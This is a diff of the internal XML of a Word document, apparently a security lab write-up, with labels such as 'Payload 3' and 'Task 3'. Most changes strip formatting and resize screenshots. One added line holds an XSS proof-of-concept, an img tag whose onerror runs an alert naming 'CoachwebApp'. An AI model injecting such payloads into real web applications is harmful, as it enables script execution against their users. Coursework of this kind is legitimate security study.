-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1710192"/>
+                <wp:extent cx="6858000" cy="3661552"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="9" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -1112,7 +826,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="446436496" name=""/>
+                        <pic:cNvPr id="221991243" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -1125,7 +839,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="1710191"/>
+                          <a:ext cx="6858000" cy="3661551"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1158,7 +872,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i8" o:spid="_x0000_s8" type="#_x0000_t75" style="width:540.00pt;height:134.66pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i8" o:spid="_x0000_s8" type="#_x0000_t75" style="width:540.00pt;height:288.31pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId17" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -1166,143 +880,24 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Payload 3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2692620"/>
+                <wp:extent cx="6858000" cy="4128267"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="10" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -1312,7 +907,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="777700892" name=""/>
+                        <pic:cNvPr id="2062097630" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -1325,7 +920,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2692620"/>
+                          <a:ext cx="6858000" cy="4128267"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1358,7 +953,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i9" o:spid="_x0000_s9" type="#_x0000_t75" style="width:540.00pt;height:212.02pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i9" o:spid="_x0000_s9" type="#_x0000_t75" style="width:540.00pt;height:325.06pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId18" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -1366,42 +961,46 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1578548"/>
+                <wp:extent cx="6858000" cy="2931574"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="11" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -1411,7 +1010,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1163060906" name=""/>
+                        <pic:cNvPr id="1881021264" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -1424,7 +1023,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="1578548"/>
+                          <a:ext cx="6858000" cy="2931573"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1457,7 +1056,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i10" o:spid="_x0000_s10" type="#_x0000_t75" style="width:540.00pt;height:124.30pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i10" o:spid="_x0000_s10" type="#_x0000_t75" style="width:540.00pt;height:230.83pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId19" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -1465,183 +1064,35 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Payload 4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2629531"/>
+                <wp:extent cx="6858000" cy="2244549"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="12" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -1651,7 +1102,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1866605704" name=""/>
+                        <pic:cNvPr id="986034182" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -1664,7 +1115,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2629531"/>
+                          <a:ext cx="6858000" cy="2244549"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1697,7 +1148,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i11" o:spid="_x0000_s11" type="#_x0000_t75" style="width:540.00pt;height:207.05pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i11" o:spid="_x0000_s11" type="#_x0000_t75" style="width:540.00pt;height:176.74pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId20" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -1705,53 +1156,50 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
+        <w:t xml:space="preserve">&lt;img src=x style="display:none" onerror="alert('XSS on CoachwebApp')"&gt;</w:t>
       </w:r>
       <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1846881"/>
+                <wp:extent cx="6858000" cy="2503874"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="13" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -1761,7 +1209,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="514927153" name=""/>
+                        <pic:cNvPr id="353849266" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -1774,7 +1222,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="1846881"/>
+                          <a:ext cx="6857999" cy="2503873"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1807,7 +1255,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i12" o:spid="_x0000_s12" type="#_x0000_t75" style="width:540.00pt;height:145.42pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i12" o:spid="_x0000_s12" type="#_x0000_t75" style="width:540.00pt;height:197.16pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId21" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -1815,140 +1263,56 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="831"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Task 3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:hyperlink r:id="rId22" w:tooltip="https://stackoverflow.com/a/8828123/14819138" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="874"/>
-            <w:highlight w:val="none"/>
-          </w:rPr>
-          <w:t xml:space="preserve">https://stackoverflow.com/a/8828123/14819138</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="874"/>
-            <w:highlight w:val="none"/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="874"/>
-            <w:highlight w:val="none"/>
-          </w:rPr>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2647991"/>
+                <wp:extent cx="6858000" cy="1825765"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="14" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -1958,20 +1322,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="438278867" name=""/>
+                        <pic:cNvPr id="1066513496" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
                         <pic:nvPr/>
                       </pic:nvPicPr>
                       <pic:blipFill rotWithShape="1">
-                        <a:blip r:embed="rId23"/>
+                        <a:blip r:embed="rId22"/>
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2647991"/>
+                          <a:ext cx="6858000" cy="1825765"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -2004,70 +1368,57 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i13" o:spid="_x0000_s13" type="#_x0000_t75" style="width:540.00pt;height:208.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
-                <v:imagedata r:id="rId23" o:title=""/>
+              <v:shape id="_x0000_i13" o:spid="_x0000_s13" type="#_x0000_t75" style="width:540.00pt;height:143.76pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+                <v:imagedata r:id="rId22" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2647991"/>
+                <wp:extent cx="6858000" cy="3007366"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="15" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -2077,20 +1428,20 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="607938174" name=""/>
